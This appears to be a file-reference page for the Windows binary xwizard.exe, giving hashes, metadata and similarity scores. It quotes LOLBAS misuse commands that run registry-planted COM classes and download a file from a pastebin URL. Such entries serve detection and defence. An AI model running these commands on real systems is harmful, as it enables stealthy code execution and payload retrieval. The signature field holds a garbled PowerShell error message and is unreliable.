xwizard.exe

  • File Path: C:\windows\system32\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 2AFA70B713D8AF4279C9FDAE7AD08A9D
SHA1 4D3CE11E2053ECAE7094B25E94CE6530F22D92BF
SHA256 1FF04F65E3E09B6F960AED6C7A88C51FEE58ABC37D05848F4248CE409B018741
SHA384 14960C498BF8CBEECB384DEC66E13417C836C9424CA6A915A8330AEFFD75C6010ACDC180627B0ED3DE4997BC300E3EAF
SHA512 89C1B99789ECD205C5D963697B22CECE4E043E7BFAE10F68CEF36FE1237FE9A85F1E2D2E24CF5E1089D1B552027D9CEA16500241EEBE85875E9FC8EEEEBC7CE9
SSDEEP 1536:MhvOmwbTRLqt2Mb9zi6l5URDoq4OZZZLlCIib:6beLqt2Mxzi6l2RD68wb

Signature

  • Status: The file C:\windows\system32\xwizard.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial:
  • Thumbprint:
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 6.3.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 54
C:\WINDOWS\system32\ComputerDefaults.exe 49
C:\Windows\system32\ComputerDefaults.exe 52
C:\windows\system32\ComputerDefaults.exe 57
C:\Windows\system32\ComputerDefaults.exe 50
C:\Windows\system32\xwizard.exe 52
C:\Windows\system32\xwizard.exe 46
C:\WINDOWS\system32\xwizard.exe 49
C:\Windows\system32\xwizard.exe 58
C:\windows\SysWOW64\ComputerDefaults.exe 58
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 46
C:\Windows\SysWOW64\ComputerDefaults.exe 57
C:\Windows\SysWOW64\ComputerDefaults.exe 54
C:\Windows\SysWOW64\ComputerDefaults.exe 46
C:\Windows\SysWOW64\xwizard.exe 58
C:\Windows\SysWOW64\xwizard.exe 54
C:\windows\SysWOW64\xwizard.exe 58
C:\Windows\SysWOW64\xwizard.exe 54
C:\WINDOWS\SysWOW64\xwizard.exe 57

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

| Source | Source File | Example | License |
| --- | --- | --- | --- |
| LOLBAS | Xwizard.yml | Name: Xwizard.exe | |
| LOLBAS | Xwizard.yml | - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | |
| LOLBAS | Xwizard.yml | Description: Xwizard.exe running a custom class that has been added to the registry. | |
| LOLBAS | Xwizard.yml | - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} | |
| LOLBAS | Xwizard.yml | Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. | |
| LOLBAS | Xwizard.yml | - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM | |
| LOLBAS | Xwizard.yml | Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. | |
| LOLBAS | Xwizard.yml | - Path: C:\Windows\System32\xwizard.exe | |
| LOLBAS | Xwizard.yml | - Path: C:\Windows\SysWOW64\xwizard.exe | |

MIT License. Copyright (c) 2020-2021 Strontic.